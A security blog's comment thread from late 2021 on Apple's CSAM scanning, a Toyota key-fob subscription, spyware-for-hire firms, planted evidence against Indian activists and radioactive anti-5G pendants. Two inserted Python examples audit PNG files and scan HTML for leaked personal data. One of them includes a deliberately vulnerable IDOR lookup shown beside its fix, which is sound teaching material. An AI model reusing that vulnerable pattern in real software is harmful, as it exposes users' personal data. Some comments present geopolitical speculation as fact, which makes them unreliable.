The problem from TSMC’s point of view is that if they set up a 5nm fab as the US Gov is pushing for, it’s a huge investment in a foreign nation it has little reason to trust based on the tricks by the previous administration. So such a plant would be a very significant “hostage” not just monetarily but way more importantly in “Intellectual Property”(IP).

No doubt some in the US Government would not be averse to putting the “hurry up” on TSMC…

The problem for the US though is that TSMC has more affiliation with Europe, on which it is rather more than dependent, but effectively “joined at the hip” with,

1, ASML in the Netherlands
2, Zeiss in Germany.

As I’ve mentioned before ASML are the world leaders in fab technology and they in turn are dependent on Zeiss for the world leading optics.

The US is known to have “put the screws” on both companies in the past so whilst in public there might be smiles Europeans have “long memories” of much that has been stolen IP wise in the US.

The other thing to remember is all the US 5G and Huawei nonsense is nothing whatsoever to do with “spying”. GCHQ and thus the NSA know exactly what goes into Huawei’s leading edge technology.

The US do not like GSM because they can not “milk it” currently. They want to cause it to stall and fail and try to grab what will be 6G thus they can not only milk it via Royalties, they can also put lots of little NSA / GCHQ hooks in to do exactly what the US have accused the Chinese of doing.

TSMC are fairly well aware of what is going on as they manufacture the chips for Broadcom, Qualcomm, and Nvidia.

Names anyone with knowledge of Telecomms, high end computing and Smart Devices and IoT should be more than aware of. Oh and Nvidia is trying to grab ARM at a knock down price only the EU has effectively said “NO” and the UK Government is now belatedly waving its arms around.

What is unknown is who it is designed to help and who it is to frustrate.

I’d put a small wager, based on the current UK PM and Ministers, it would be the US and EU respectively. Especially as current US State Dept policy is to “stir it up and destabilize Europe”. Which is in part behind the recent AUKUS agreement (of which there is one hell of a lot more going on behind the scenes than most suspect).

Other things going on suggest that the US is planning to in effect “go to war” at least economically with the EU and potentially militarily as well with China. Which is probably good news for Iran, but not North Korea, South Korea, Japan or Taiwan and several other countries around the South China Seas and up and down the West Pacific region that China increasingly sees as its “buffer zone” and sphere of influence.

How this is going to play out is anyone’s guess at the moment, especially with some of the all too clear idiocy going on in the “US Opposition” currently. But I’d advise people to be skeptical of apparent “slam dunk” cyber accusations against China.

Clive Robinson December 15, 2021 11:27 AM

@ Ted,

Is Apple rolling back CSAM detection?

Well the message on,

https://www.apple.com/child-safety/

Indicates that might be the case, as it only talks about nudity and importantly not sending notifications.

However…

Read the update at the bottom of MacRumours that says,

“Apple spokesperson Shane Bauer told The Verge that though the CSAM detection feature is no longer mentioned on its website, plans for CSAM detection have not changed since September, which means CSAM detection is still coming in the future.”

You can read more on,

https://www.pcmag.com/news/apple-quietly-removes-mention-of-anti-child-porn-system-from-its-website

https://www.macrumors.com/2021/12/15/apple-nixes-csam-references-website/

https://everything-apple.news/2021/12/15/apple-removes-references-to-controversial-csam-scanning-from-website/

https://www.theverge.com/2021/12/15/22837631/apple-csam-detection-child-safety-feature-webpage-removal-delay

AL December 15, 2021 12:46 PM

According to Apple, the CSAM was included in update IOS 15.2
https://www.apple.com/child-safety/
Way I look at it, once there is a client side scanner, it can be repurposed to scan anything. Apple has opened a door, and I see government orders walking in to order a reconfiguration of that scanner.

Ted December 15, 2021 1:21 PM

@Clive

Re: Apple, CSAM, and let’s not forget… on-device scanning

Just fantastic Clive. Beautiful.

I’m grateful that the PC Mag article you shared had a link to Apple’s previous CSAM detection notice on their site.

The Messages app will use on-device machine learning to warn about sensitive content, while keeping private communications unreadable by Apple.

https://web.archive.org/web/20211210163051/https://www.apple.com/child-safety/

I thought you might appreciate one of the more liked comments on the MacRumors article. This is the same article with Apple’s recent update: “CSAM detection is still coming in the future.”

Jim L.
If I ever find out this has been surreptitiously added without my knowledge then I will sell every Apple device I own and never buy another. Anyone who doesn’t have an issue with this has no clue of the concept of mission creep. If these systems are allowed to exist then it’s only a matter of time before the Feds batter your door in for having a [insert future dictator here] meme in your iCloud library. The road to hell is paved with good intentions.

Also from that MacRumors article was the following paragraph:

Apple said its decision to delay was “based on feedback from customers, advocacy groups, researchers and others… we have decided to take additional time over the coming months to collect input and make improvements before releasing these critically important child safety features.”

I’m not sure if this comment from Apple was its most recent. Will they be providing public details on CSAM detection when(?) they decide to implement it? Will there still be on-device scanning?

In the most recent update, it looks like there were changes to Messages pertaining to child safety and nudity, but I don’t think anyone noticed anything explicit about CSAM and on-device scanning. The Verge article has some particularly good links. It also says that “Documents outlining how the functionality works are still live on Apple’s site.”

https://www.apple.com/child-safety/pdf/CSAM_Detection_Technical_Summary.pdf

https://www.apple.com/child-safety/pdf/Expanded_Protections_for_Children_Frequently_Asked_Questions.pdf

So it’s definitely something to keep an eye on, right Jim L. and everyone?

JonKnowsNothing December 15, 2021 3:26 PM

@Clive, @All

re: “Car Key Fobs needed to start Toyota cars is now a service costing $8/mo”

Automakers keep trying to get a piece of that sweet, sweet subscription income. Now, it’s Toyota’s turn.

Nearly every car company offers some sort of subscription package, and Toyota has one called Remote Connect. The service offers the usual fare, letting owners use an app to remotely lock their doors, for example, or if they own a plug-in vehicle, to precondition the interior.

But as some complimentary subscriptions for Remote Connect come to an end, Toyota owners are getting an unexpected surprise—they can no longer use their key fob to remote-start their vehicles.

fwiw:

My slightly older VW has a door key hidden inside the fob, usable in case the fob battery dies you can get inside. The car does not have an ignition key slot. You have to hold the fob against a magic circle. Yes. If the fob battery is dead, you cannot start the car anymore than you can open the door.

Having to pay a fee just to start the car with a good key fob battery and no option for a keyed ignition?

I’m NoSoKeenAboot this.

Ranks right up there with their Full Size Pickup Trucks where they have huge bolts sticking up in the bed floor. Clearly no one at Toyota ever bucked hay…

===

  • Toyota owners have to pay $8/mo to keep using their key fob for remote start
    Feature requires subscription even though it doesn’t use connected services.

https://arstechnica.com/cars/2021/12/toyota-owners-have-to-pay-8-mo-to-keep-using-their-key-fob-for-remote-start/

Ted December 15, 2021 3:48 PM

Ars Technica has more details on Apple’s recent updates.

Also what do you all think of the new App Privacy Report in iOS 15.2? Weird or good?

App Privacy Report in Settings lets you see how often apps have accessed your location, photos, camera, microphone, contacts and more during the last seven days, as well as their network activity.

https://arstechnica.com/gadgets/2021/12/apples-ios-15-2-and-macos-12-1-updates-hit-supported-devices-today/

From WaPo:

… but there are some things it still can’t tell us, like exactly what data is being collected or sent by these apps.

For example, you might see that a dog-sitting app accessed your contacts but not know what it took…

Or you might notice that a plant-identification app contacted multiple outside domains, but not know what sort of data was sent to those addresses.

“They are taking the medium to long term view that, essentially, if you name and shame enough of these then apps will gradually improve their behavior,” said Johnny Lin, the co-founder of San Francisco company Lockdown.

https://www.washingtonpost.com/technology/2021/12/15/ios-privacy-report/

SpaceLifeForm December 15, 2021 10:33 PM

@ JonKnowsNothing

Toyota owners have to pay $8/mo to keep using their key fob for remote start
Feature requires subscription even though it doesn’t use connected services.

How does the car computer know if the owner paid the vig?

Is the fob like an AirTag?

JonKnowsNothing December 16, 2021 1:19 AM

@SpaceLifeForm

re:KeyFob AirTag

The article didn’t say how they disable the fob feature but did say the fob doesn’t use connected services.

Zho…

There is the old OnStar/Updater to the car software system.

At least my OnStar knows I never subscribed to OnStar because if I accidentally push The Red Button which is conveniently located near the ceiling light switches, it tells me so.

The same over-the-air process handles all those other apps and features for the entertainment systems.

I would guess that, in the absence of a subscription=YES flag, the car software ignores the remote command. The fob or app sends the remote start command but the car software drops it in the bit bucket.

It might be worth noting that if the remote start can be disabled by over-the-air updater, there isn’t any reason they can’t block the car from starting in other situations. As previous discussions pointed out, stopping the engine of a moving modern car has many dangerous side effects. However, halting the engine of the car when already stopped (not in motion) or the engine turned off (while refueling etc) might be possible.

iirc(badly) One of the recommendations for remote start was a safety issue for workers in late night or isolated location situations. The worker would know before exiting the safety of the locked building that the car was running.

Also for bad weather conditions where you might have a lot of ice on the windscreen, the remote start would also turn on the window defrosters. Again a safety feature so the worker doesn’t have to wait 20m in the car while the ice melts.

ResearcherZero December 16, 2021 1:34 AM

Relativity confirmed to be true again through observations of two companion pulsars.

“We see for the first time how the light is not only delayed due to a strong curvature of spacetime around the companion, but also that the light is deflected by a small angle of 0.04 degrees that we can detect.”

https://www.mpifr-bonn.mpg.de/pressreleases/2021/12

SpaceLifeForm December 16, 2021 2:29 AM

@ JonKnowsNothing, Clive

The article didn’t say how they disable the fob feature but did say the fob doesn’t use connected services.

Which has to be a lie or spin. There has to be some comms somewhere.

Winter December 16, 2021 3:07 AM

@ResearcherZero
“Relativity confirmed to be true again through observations of two companion pulsars.”

It is outrageous that such a simple theory (it is nothing more than applied Math) is so successful.

Physics is now cursed by two incompatible theories, General Relativity and Quantum Field Theory, that are both exact to the last measurable decimal.

Ted December 16, 2021 8:02 AM

@SpaceLifeForm, Clive, ALL

Planet or fruit?

That’s really interesting. To add to that, Ross Anderson, who is a non-prolific tweeter, retweeted this:

@SarahJamieLewis
Thinking all the way back to a few months ago when everyone was talking about threat models and image sharing and client side scanning and how silly a scenario it was to imagine a method of getting an innocent target to download a file that would result in a match.

Sarah’s was a quote retweet on this:

I crafted a PNG image that says something different on Apple vs non-Apple devices:

https://www.da.vidbuchanan.co.uk/widgets/pngdiff/

(unfortunately it won’t work directly on twitter…)

https://twitter.com/sarahjamielewis/status/1471325841632100354

Winter December 16, 2021 12:59 PM

10 anti-5G products, ie, they should protect against cellular 5G radiation, among them the Quantum Pendant, have been recalled by the health authorities in the Netherlands as they are too radioactive. They emit too much radiation.

Dutch site:
https://www.autoriteitnvs.nl/actueel/nieuws/2021/12/16/heeft-u-een-quantum-pendant-anti-5g-hanger-of-negatief-ionen-sieraad-of-slaapmasker-leg-deze-veilig-weg

Winter December 16, 2021 2:00 PM

Continued:
An English language site with warnings:
This remedy sounds like Homeopathy: Protect against radio waves with radioactive materials. Both have the words “radio” in their name and are electromagnetic radiation.

The items are advertised as having negative ion technology, quantum scalar energy, volcanic lava energy, and quantum science. Items include pendants, wristbands, kinesiology tape, and other personal items. They are advertised as a way to maintain health, balance energy, and improve emotional well-being. Some also claim to protect people and pets from electromagnetic fields (EMF).

Reading such stuff I remind myself of this famous quote:
I know of only two infinites, the Universe and human stupidity, and I am unsure about the Universe

https://www.doh.wa.gov/CommunityandEnvironment/Radiation/RadiationTopics/RadioactiveConsumerProducts

Clive Robinson December 16, 2021 4:02 PM

@ Winter, ALL,

Both have the words “radio” in their name and are electromagnetic radiation.

They are not the first with radiation as a health benefit…

Look up the history of radium and its alleged curative powers a little over a century ago.

In fact just naming something with Radium was the equivalent of giving it magic restorative powers, even if it did not have radium in it…

It was the new snake oil of its time and much was made of it; in fact a town's fortunes could hang on a supply of noxious output from aquifers.

Have a look at,

https://exploreclaremorehistory.wordpress.com/2021/12/16/go-with-the-flow-to-the-bungalow/

It makes fascinating reading especially the bit with a man trying to out run a barrel that chased him during bad weather.

So that was the power of magic “woo-woo”… Still alive today with stern admonishment for those that dare question by use of science…

After all you don’t need science when you have the evidence of your second hand experience, so of course there can be no question,

The Earth is flat and 5G makes you glow in the dark and gives even women male pattern baldness at an early age…

There can be no doubt :-S

Ted December 16, 2021 4:40 PM

The UK’s PSTI bill is currently in Parliament’s House of Commons for review.

As you all remember, this is the bill that would introduce new security regulations for IoT devices.

The bill appears to be at the 2nd reading stage. According to the parliament’s website, a date for the 2nd reading has not yet been announced.

https://bills.parliament.uk/bills/3069

Do you all remember Statler and Waldorf? These were the cantankerous pair of Muppets who had a penchant for heckling from a theatre balcony.

Well, this bill seems to be getting a little of the same treatment. Because, of course, good security is hard. And expensive.

Here were some of the questions raised:

Who would be responsible for managing a device’s unique password? And would technicians need backdoor access for repairs if a user forgets their password?

Someone said: ‘there’s nothing in the bill that requires bugs to be fixed before they are disclosed.’

But at first glance, I don’t really understand how this relates to the requirement for products to have a vulnerability disclosure policy?

There was also a concern that manufacturers would discount prices at a product's end-of-life (when it is no longer receiving security updates) and drive consumers to buy less secure devices.

There is also the question of how UK markets will deal with products from China, who may not comply with UK regulations.

Still others believe the UK government isn’t acting fast enough.

But at least people are really thinking about this. We don’t want to keep sitting on square one just because manufacturers don’t suffer the same losses as the rest of us.

https://techcrunch.com/2021/12/04/uk-internet-of-things-cybersecurity-bill/

SpaceLifeForm December 16, 2021 5:38 PM

@ Clive

Assumed?

It is assumed that fraudulent passports have been issued in exchange for cash…

Oh, my bad. I thought you were referring to actual passports.

ResearcherZero December 16, 2021 10:44 PM

@Ted

Maybe, vulnerabilities like Log4j will prompt them to consider the bill wisely, but then trying to explain technical problems to politicians is an issue in itself.
Financial cost is something they can understand, and perhaps if they understood technical problems meant that “all your secrets and correspondence will spill out”, maybe they would understand that.

Spyware firms spying on politicians on behalf of governments.

Meta was able to determine in some cases that the spyware firms were working on behalf of governments, law firms and individuals, the companies were “indiscriminate” about whom they targeted. “We are seeing politicians. We’re seeing human rights activists. We’re seeing lawyers, doctors, clergy, in some cases ordinary citizens. Anyone who might be party to a lawsuit,”

“Almost anyone can hire one of these firms,” he said. “These firms both democratize these threats and they give an added layer of deception to the worst actors.”

Black Cube created fake accounts posing as graduate students, human rights workers and film and TV producers and tried to set up phone calls and get email addresses for a wide range of targets,

Bluehawk CI tried to trick government opponents in the United Arab Emirates by pretending to be reporters for Fox News and Italy’s La Stampa,

Meta also took down accounts connected to “an unidentified entity in China” that, Meta says, made tools used by Chinese law enforcement to spy on minority groups in Xinjiang, Myanmar and Hong Kong.

https://www.npr.org/2021/12/16/1064628654/facebook-bans-surveillance-firms-that-spied-on-50000-people

hxxps://about.fb.com/wp-content/uploads/2021/12/Threat-Report-on-the-Surveillance-for-Hire-Industry.pdf

Craft PNG files that appear completely different in Apple software
hxxps://www.da.vidbuchanan.co.uk/widgets/pngdiff/
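As an added example that is not part of the thread, not David Buchanan's generator and not code from any linked page: when two viewers show different pictures for one file, the decoders disagree on how to read the chunk stream. The walker below verifies each chunk's CRC and reports the places where decoders are known to diverge (bad CRCs, private chunks, bytes after IEND, non-consecutive IDAT, an IDAT stream whose size does not match IHDR). The page does not describe the mechanism behind the linked widget and it is not reproduced here; the sample file is a 2x1 RGB image built inline, and the private chunk name "prVt" is made up for the example.

```python
"""Added example: not David Buchanan's generator and not code from the page.
Sample file is a constructed 2x1 RGB PNG; the chunk name "prVt" is made up."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CORE_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"cHRM", b"gAMA", b"iCCP",
               b"sBIT", b"sRGB", b"bKGD", b"hIST", b"tRNS", b"pHYs", b"sPLT",
               b"tIME", b"iTXt", b"tEXt", b"zTXt"}


def chunk(ctype: bytes, body: bytes, bad_crc: bool = False) -> bytes:
    """Serialise one chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    if bad_crc:
        crc ^= 1                      # flip one bit so the CRC no longer matches
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png(tamper: bool = True) -> bytes:
    """2x1 8-bit RGB image (one red, one blue pixel). With tamper=True a
    private chunk with a broken CRC and junk after IEND are added."""
    ihdr = struct.pack(">IIBBBBB", 2, 1, 8, 2, 0, 0, 0)   # w, h, depth, colour type 2
    raw = b"\x00" + bytes([255, 0, 0, 0, 0, 255])          # filter byte 0 + 2 pixels
    png = PNG_SIG + chunk(b"IHDR", ihdr)
    if tamper:
        png += chunk(b"prVt", b"opaque-private-data", bad_crc=True)
    png += chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")
    if tamper:
        png += b"trailing-bytes-after-IEND"
    return png


def parse_chunks(data: bytes):
    """Return (chunks, trailing): chunks is a list of (type, body, crc_ok),
    trailing is the number of bytes found after IEND."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG signature")
    chunks, pos = [], 8
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError(f"truncated chunk header at offset {pos}")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_raw = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_raw) != 4:
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        expected = zlib.crc32(ctype + body) & 0xFFFFFFFF
        chunks.append((ctype, body, struct.unpack(">I", crc_raw)[0] == expected))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, len(data) - pos


def audit_png(data: bytes) -> list:
    """Findings to review before trusting any single viewer's rendering."""
    chunks, trailing = parse_chunks(data)
    types = [t for t, _, _ in chunks]
    findings = []
    if not types or types[0] != b"IHDR":
        findings.append("first chunk is not IHDR")
    if b"IEND" not in types:
        findings.append("no IEND chunk")
    if trailing:
        findings.append(f"{trailing} bytes after IEND (most decoders ignore them, not all)")
    idat_pos = [i for i, t in enumerate(types) if t == b"IDAT"]
    if idat_pos and idat_pos[-1] - idat_pos[0] + 1 != len(idat_pos):
        findings.append("IDAT chunks are not consecutive")
    for ctype, body, crc_ok in chunks:
        name = ctype.decode("latin-1")
        if not crc_ok:
            findings.append(f"{name}: CRC mismatch (decoders reject, warn or ignore)")
        ancillary = bool(ctype[0] & 0x20)   # bit 5 of byte 0: lowercase = ancillary
        private = bool(ctype[1] & 0x20)     # bit 5 of byte 1: lowercase = private
        if ancillary and private:
            findings.append(f"{name}: private ancillary chunk ({len(body)} bytes), decoder-specific meaning")
        elif ctype not in CORE_CHUNKS:
            findings.append(f"{name}: not a core public chunk type")
    # Does the pixel stream actually fit the geometry IHDR declares?
    ihdr = next((b for t, b, _ in chunks if t == b"IHDR"), None)
    idat = b"".join(b for t, b, _ in chunks if t == b"IDAT")
    if ihdr is not None and len(ihdr) == 13 and idat:
        w, h, depth, colour, _, _, interlace = struct.unpack(">IIBBBBB", ihdr)
        channels = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}.get(colour, 0)
        if channels and not interlace:
            row = 1 + (w * channels * depth + 7) // 8   # filter byte + packed pixels
            try:
                got = len(zlib.decompress(idat))
            except zlib.error as exc:
                findings.append(f"IDAT: zlib stream does not decompress ({exc})")
            else:
                if got != h * row:
                    findings.append(f"IDAT: decompresses to {got} bytes, IHDR needs {h * row}")
    return findings


if __name__ == "__main__":
    for line in audit_png(build_sample_png()):
        print(line)
```

Run it against a suspect file instead of the constructed one by passing `open(path, "rb").read()` to `audit_png`; an empty list means the chunk stream is unambiguous at this level, not that the image is safe.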

ResearcherZero December 17, 2021 12:15 AM

Private spy firms helped Qatar beat other bids for World Cup

Global Risk Advisors bills itself as “an international strategic consultancy specializing in cybersecurity, military and law enforcement training, and intelligence-based advisory services”

Chalker also promised the Qataris the use of I.T. and “technical collection specialists” as well as top field operatives with backgrounds in “highly sensitive U.S. intelligence and military operations” who could “spot, assess, develop, recruit, and handle assets with access to persons and topics of interests” on Qatar’s behalf, company materials show.

He also emphasized aggression and discretion, saying his plans included “patsies,” and “lightning rods,” psychological operations, and “persistent and aggressive distractions and disruptions” aimed at Qatar’s enemies all while giving the country “full deniability,” company records show.

AP reviewed a variety of projects Global Risk Advisors proposed between 2014 and 2017; they show proposals not just directly related to the World Cup.

They included “Pickaxe,” which promised to capture “personal information and biometrics” of migrants working in Qatar. “Falconeye” was described as a plan to use drones to provide surveillance of ports and borders operations, as well as “controlling migrant worker populations centers.”

Another project, “Viper” promised on-site or remote “mobile device exploitation,” which Global Risk Advisors said would deliver “critical intelligence” and enhance national security.

Chalker authored a proposal for “Project Deviant.” It called for Global Risk Advisors to provide a robust spying and hacking training program for employees at Qatar’s Ministry of Interior “based on the elite training undertaken by (Global Risk Advisors) officers from the U.S. military and intelligence agencies. ” Deviant included a 47-week “field operations tradecraft course” that would include training on surveillance, disguises, interrogation techniques, asset recruitment, hand-to-hand combat, and other areas, a GRA proposal shows.

The 26-week “technical operations tradecraft course” promised to teach Qataris with just a basic IT background to become world-class hackers with the “necessary knowledge, skills and techniques to use highly restricted, cutting-edge tools to penetrate target systems and devices, collect and analyze bulk signals data, and to track and locate targets to ultra-precise locations,” records show.

https://apnews.com/article/soccer-sports-business-migration-middle-east-d9716b62fc69ab88beb3553d402da7d1

ResearcherZero December 17, 2021 12:18 AM

“The site was super leaky. Every advert on the site included the seller’s postcode or GPS coordinates – even if the seller requested the map of their location to be hidden. It leaked the sellers email address, and their full name was available via a simple IDOR vulnerability.”

In October the governor of Missouri threatened to prosecute a local journalist who found some Social Security Numbers in the HTML source of the Department of Elementary and Secondary Education’s web site. This type of response isn’t uncommon when trying to disclose information to a vendor. It’s not often they are grateful, and usually they want to keep it quiet, don’t respond, or they don’t understand and want to sue you.

Inspired by Governor Parson, I developed a multi-stage process to view sensitive information belonging to other Gumtree users:

1 View an advert on gumtree.com
2 Press F12
3 Read
4 The
5 Sellers
6 Email
7 Address
8 In
9 The
10 HTML

https://www.pentestpartners.com/security-blog/gumtree-leaking-your-data-and-not-really-listening/
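As an added example that is not part of the thread and not code from the Pen Test Partners post or from Gumtree: two checks for the kind of leak described above. The first scans a page's raw HTML for personal data that should not be shipped to every visitor (a seller's email, postcode or GPS coordinates, even when the map is "hidden"); the second shows the IDOR pattern, a profile lookup keyed only by the id in the request, next to a version that authorises against the record. The advert HTML and the seller table are constructed for the example, and the email address, postcode and coordinates in them are made up.

```python
"""Added example, not code from the Pen Test Partners post or from Gumtree.
The advert HTML and seller table are constructed; all personal data is made up."""
import re
from dataclasses import dataclass

# Constructed advert page: the visible page hides the location, but a data
# attribute and an embedded JSON blob still carry the seller's details.
SAMPLE_ADVERT_HTML = """<html><body>
<h1>Mountain bike for sale</h1>
<div class="map" data-hidden="true" data-lat="51.50130" data-lng="-0.14189"></div>
<script>window.__AD__ = {"id": 4421, "seller": {"uid": 9031,
  "email": "seller.example@example.com", "postcode": "SW1A 1AA"}};</script>
</body></html>"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# UK postcode: outward code, optional space, inward code.
POSTCODE_RE = re.compile(r"\b[A-Z]{1,2}\d[A-Z\d]?\s*\d[A-Z]{2}\b", re.I)
# A latitude followed (anywhere later) by a longitude, in JSON or attributes.
COORD_RE = re.compile(
    r'(?:lat|latitude)["\']?\s*[=:]\s*["\']?(-?\d{1,2}\.\d+)'
    r'.*?(?:lng|lon|longitude)["\']?\s*[=:]\s*["\']?(-?\d{1,3}\.\d+)',
    re.I | re.S)


def find_leaks(html: str) -> dict:
    """Return personal data found anywhere in the raw HTML, visible or not."""
    leaks = {
        "emails": sorted(set(EMAIL_RE.findall(html))),
        "postcodes": sorted({m.upper() for m in POSTCODE_RE.findall(html)}),
        "coordinates": [(float(a), float(b)) for a, b in COORD_RE.findall(html)],
    }
    return {k: v for k, v in leaks.items() if v}


@dataclass(frozen=True)
class Seller:
    uid: int
    full_name: str
    email: str


# Constructed user table standing in for the site's database.
SELLERS = {
    9031: Seller(9031, "Example Seller", "seller.example@example.com"),
    9032: Seller(9032, "Another Seller", "another@example.net"),
}


def seller_profile_vulnerable(requester_uid: int, seller_uid: int) -> dict:
    """IDOR: the record is chosen purely by the id in the request, so any
    logged-in user can walk the id space and read everyone's name and email."""
    s = SELLERS[seller_uid]
    return {"full_name": s.full_name, "email": s.email}


def seller_profile_fixed(requester_uid: int, seller_uid: int) -> dict:
    """Authorise against the object, not just the session: the seller sees
    their own details; anyone else gets only a relay handle for contact."""
    s = SELLERS[seller_uid]
    if requester_uid == s.uid:
        return {"full_name": s.full_name, "email": s.email}
    return {"contact": f"relay-{s.uid}"}


if __name__ == "__main__":
    print(find_leaks(SAMPLE_ADVERT_HTML))
    print(seller_profile_vulnerable(1, 9031))
    print(seller_profile_fixed(1, 9031))
```

The scanner deliberately works on the raw response body rather than the rendered DOM, because "hidden" only describes what the browser draws; anything in the HTML, script blocks or data attributes is already on the visitor's machine.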

Winter December 17, 2021 12:28 AM

@Clive
“Look up the history of radium and its alleged curative powers a little over a century ago.”

Indeed, drinking radium water was all the rage back then.

One thing that prevented people from seeing the dangers is that some people have a high tolerance to radium. They would advocate the safety and health of radium on their own body, all the while really believing their own words. Other people would fall for it and die a gruesome death.

Read this absolute horror story:
ht-tps://medium.com/lessons-from-history/the-blessings-of-radium-water-made-his-head-disintegrate-3ac052cb8620

Alternative healing is poison. Sometimes literally so.

Ted December 17, 2021 12:49 AM

@ResearcherZero

Re: Meta (formerly Facebook) and “surveillance-for-hire” companies

Wow. So interesting. It’s curious that Meta identified and focused on providers in certain countries:

These providers are based in China, Israel, India, and North Macedonia.

To add to your post, here are the 7 companies being banned: Cobwebs, Cognyte, Black Cube, Bluehawk CI, BellTroX, Cytrox, and an unknown entity in China.

In their Threat Report, Meta holds this as one of their principles:

Governance & ethics: We welcome domestic and international efforts to raise accountability through legislation, export controls and regulatory actions. We also encourage broader civil society and regulator-led conversations about the ethics of using these technologies by law enforcement and private companies, as well as creating effective victim protection regimes.

I hope Meta plans to issue accountability reports for these statements, good as they are.

https://about.fb.com/news/2021/12/taking-action-against-surveillance-for-hire/

Ted December 17, 2021 1:15 AM

@SpaceLifeForm, ResearcherZero

Re: Predator

#CitizenLab #EgyptiansInExile #Cytrox #iPhoneSpyware

You don’t have to, but you might enjoy listening to Chapter 2 of Nicole Perlroth’s book ‘The Fucking Salmon.’

The book is ‘This Is How They Tell Me the World Ends.’

So good.

ResearcherZero December 17, 2021 2:25 AM

@Ted

This is certainly a crazy story.

32 documents allegedly planted on activist's laptop.

“A smartphone belonging to jailed Indian activist Rona Wilson was infiltrated using NSO Group’s Pegasus spyware before his arrest, according to a new forensic analysis by Amnesty International’s Security Lab that reignites questions about the use of malware attacks against dissidents and government critics in India.”

The phone backups were provided to Amnesty at the request of Wilson’s defense team by Arsenal Consulting, a U.S. digital forensics firm that examined an electronic copy of Wilson’s laptop provided by his lawyers.

Amnesty’s analysis of two electronic copies of Wilson’s phone backups revealed that his phone was first compromised using Pegasus spyware in July 2017. The traces of infection appear again in early 2018, according to Amnesty.

Wilson received at least 15 SMS messages with malicious links in a span of six months, the last of which was delivered four months before his arrest in June 2018, according to Maynier. Some were disguised as links to sign petitions on human rights causes, and others were advertisements.

Wilson’s laptop had been subject to a sophisticated malware attack in 2016, nearly two years before his arrest, in which an unknown hacker planted evidence, including a letter purportedly written by Wilson to a Maoist leader where he urged the group to assassinate Modi. A subsequent forensic analysis by Arsenal revealed that at least 30 incriminating documents recovered from Wilson’s device by the police had been planted.

The charging documents claim that Wilson and more than a dozen other activists were associated with a banned guerrilla group of Maoists in central India that aims to overthrow the government. The activists deny the charges.

The activists have been charged under a stringent anti-terrorism law that critics say Modi’s government has used increasingly against dissidents.

hxxps://www.washingtonpost.com/world/2021/12/17/india-pegasus-bhima-koregaon/

“Key evidence against a group of Indian activists accused of plotting to overthrow the government was planted on a laptop seized by police, a new forensics report concludes, deepening doubts about a case viewed as a test of the rule of law under Prime Minister Narendra Modi.”

hxxps://www.washingtonpost.com/context/new-forensics-report-concludes-evidence-was-planted-in-case-against-indian-activists/1fb9874f-0f32-44fc-b9e9-0e59b69e9200/

“A previous analysis by Arsenal, which The Washington Post reported in February, found that 10 letters had been deposited on the laptop, including one that discussed an alleged plot to assassinate Modi. The latest report by Arsenal finds that 22 additional documents were also delivered to the computer by the same attacker.”

The documents — now totaling 32 — have been cited by law enforcement as evidence against a group of activists accused of working with a banned Maoist militant group that has waged a decades-old insurgency against the Indian state.

hxxps://www.washingtonpost.com/world/2021/04/20/india-bhima-koregaon-activists-report/

Clive Robinson December 17, 2021 6:05 AM

@ ResearcherZero, ALL,

Private spy firms helped Qatar beat other bids for World Cup

Sort of private… But with US Government blessing at a very high level in the hierarchy…

We know that there were a number of US personnel involved that had had NSA gigs through other “private companies” shortly before the Ed Snowden revelations showed what immoral and illegal things the US Government was up to with regards to spying on US citizens.

Feeling that “their brand was burned” and they were effectively jobless, they were “encouraged” to go and do “anti-terror” work in the Middle East.

Which is what,

“Chalker also promised the Qataris the use of I.T. and “technical collection specialists” as well as top field operatives with backgrounds in “highly sensitive U.S. intelligence and military operations” who could “spot, assess, develop, recruit, and handle assets with access to persons and topics of interests” on Qatar’s behalf, company materials show.”

Is all about.

Only some quickly found out the definition some used for “terrorist” was not the one they expected…

Which is also what,

“They included “Pickaxe ,” which promised to capture “personal information and biometrics” of migrants working in Qatar.”

Is in part about; the Qatari Government viewed “migrants” not as “workers” but as subhuman to slaves, an evil that polluted their land and for some their ideology. But nevertheless a necessary one, run at arm's length by the equivalent of “Gang Masters”. Those “gang masters'” attitudes to the “workers” made the Qatari Government views look almost saintly in comparison… The “spying on the workers” was to weed out what were seen as “trouble makers” and deal with them, by them having accidents etc. because they were “careless”…

All of this was quite a shock for some of the ex-NSA people who came back and tried to blow the whistle, mostly unsuccessfully. The reason can be found by “following the money back” in these so called “Private Companies”. You might be shocked at finding out who have fingers in those fat pies, and obviously they did not want it becoming well known. So people in effect got burned.

The moral is if you are in these dirty “spy on your fellow citizen” games for your Government, and you or what you are doing gets “outed” in some way, you are in effect left vulnerable.

Sadly some see that as opportunity. They come along and that is when that “tide you over till it blows over” job they tell you about “out of country” very likely will be the end of you one way or another.

Remember they are doing themselves a favour at your expense, because it is at best questionable work used as a cover for not just illegal but technically treasonous work.

Getting a Government Spy job shot out from underneath you does not blow over ever… You don’t come back, it just gets increasingly unethical and immoral, and either you jump right in and try to become a “King Rat” or your soul gets eaten piece by piece. Remember there is no “moral high ground” no “for the greater good” or other clap trap you get spun so that others further up the hierarchy can enjoy “Might is Right” and banking the profits. It’s all unethical and immoral, they don’t care “power is power” but if you do then you might find your personal Hell’s Gates are opened wide for you long before you die.

JonKnowsNothing December 17, 2021 10:23 AM

@All

On the good news front: Some bumper crops are being harvested in different countries.

On the bad news front: Some harvests are very poor: climate impacts (too hot, too cold, too wet, too dry) and pests (mice particularly but elephants can be a nuisance too) and wars (burning, destruction, theft).

There are the self-inflicted shortages; NZ had a problem with a dark sugar plant and their holiday supply of the preferred baking sugar was crimped.

